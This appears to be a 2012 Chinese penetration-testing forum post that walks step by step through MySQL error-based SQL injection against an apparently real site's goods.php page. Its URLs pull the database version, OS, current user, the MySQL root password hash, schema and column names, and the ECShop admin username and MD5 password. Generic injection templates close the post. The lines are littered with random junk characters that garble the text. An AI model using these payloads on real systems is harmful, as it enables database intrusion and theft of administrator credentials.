找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 2911|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 ) h# c% E$ i% D; f3 d5 M8 l% S, {
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23/ Q8 y' m% l1 Q
3 e  m: f" @. o5 i; w+ o/ C
判断系统& |& S; E  ?; q( ^7 K  H* z6 m; `

- Q+ [; g2 I' A* m2 q# t; K! Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" w& S# x9 _+ a

7 ^) O$ O  p6 n' |
$ B4 e+ f7 T' `% \. d7 J1 F) e' M$ H3 q! \  t7 l* X' Z
当前 user()/ ]. t. E: Z; z3 G
( h6 A* L5 `8 B" w. I! O
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. u5 {9 n! Z$ F/ u  d
: [4 x  V1 L+ W& O" [* N( t7 c2 s  J9 t

4 h; {4 f& }$ Q. v9 Z3 |当前 database()
$ N& k8 s' \, c  Z9 c9 R& ]http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. N; b- p. H. ]; I0 F
3 w' e- S. K$ ~4 k! n% D9 P$ \  A0 B1 ]
/ M( k  Q3 X& A
: I( L! t& j" j, s# |7 H
root hash
! L% P  C& E- I* {+ n. q6 v  q
* [6 }) V7 _6 m0 Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- V: p% D. ^4 A; K9 y! T+ ?* E' `, C, S$ @6 d4 ~6 F2 O' B, T
8 ]0 ^% y7 i4 r& [1 V

3 q" z6 q1 }# k2 f4 f, M# c当前 数据库表名% M$ x# g' P8 G5 i, V

3 n5 y/ u8 L( a8 ]: a/ B" hhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' O9 a$ q( m7 O7 a0 u6 Q& V0 N* M4 _! H8 @7 ]3 X

3 l5 W( L9 x: W0 v' v- F; C# P; W& o  I, B  ~! @# g6 V
当前 数据库 user_name 字段
& X" j& X4 h" ~
' l" h9 y" ?- d' ?0 C% b6 ^http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& i/ Q3 \- _3 T% G1 g9 d/ G6 r6 F3 H
当前 数据库 字段 password' T# ~+ \8 X% K9 O; `1 j6 B3 ?
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 j4 N" A( d! _2 X
; F8 A+ f7 E5 K& j2 Z

8 A% I) A, K# j  Y8 ^# W0 v) s- x, [9 F/ B
获得 admin passwd(md5)
0 V) U" H% {( W% \5 G& W( `: k; L% V3 Y$ N2 I. i) k% p
! R1 H! I- {9 R7 v7 w6 ?7 v
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 k% Y: N- a' x1 ]& ?9 N5 r0 t
4 W7 B0 B8 M6 V: z. [
报错注射) a0 c/ v; X( M! X! G- e" @& b. B
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)( [# n- j7 R" g+ e1 w" ^+ z  F

) k/ e; i8 z6 j0 n7 `SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
( X. m& @5 }1 a
5 Y9 X0 f) P  @6 }and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表